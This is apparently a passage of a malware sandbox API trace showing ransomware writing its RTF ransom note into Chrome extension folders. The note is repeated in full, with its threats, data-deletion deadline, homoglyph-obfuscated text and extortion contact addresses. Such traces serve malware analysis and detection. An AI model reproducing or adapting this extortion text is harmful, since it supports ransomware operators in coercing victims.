th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.270] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.271] CloseHandle (hObject=0x2c8) returned 1 [0280.271] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0280.271] GetLastError () returned 0x2 [0280.271] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 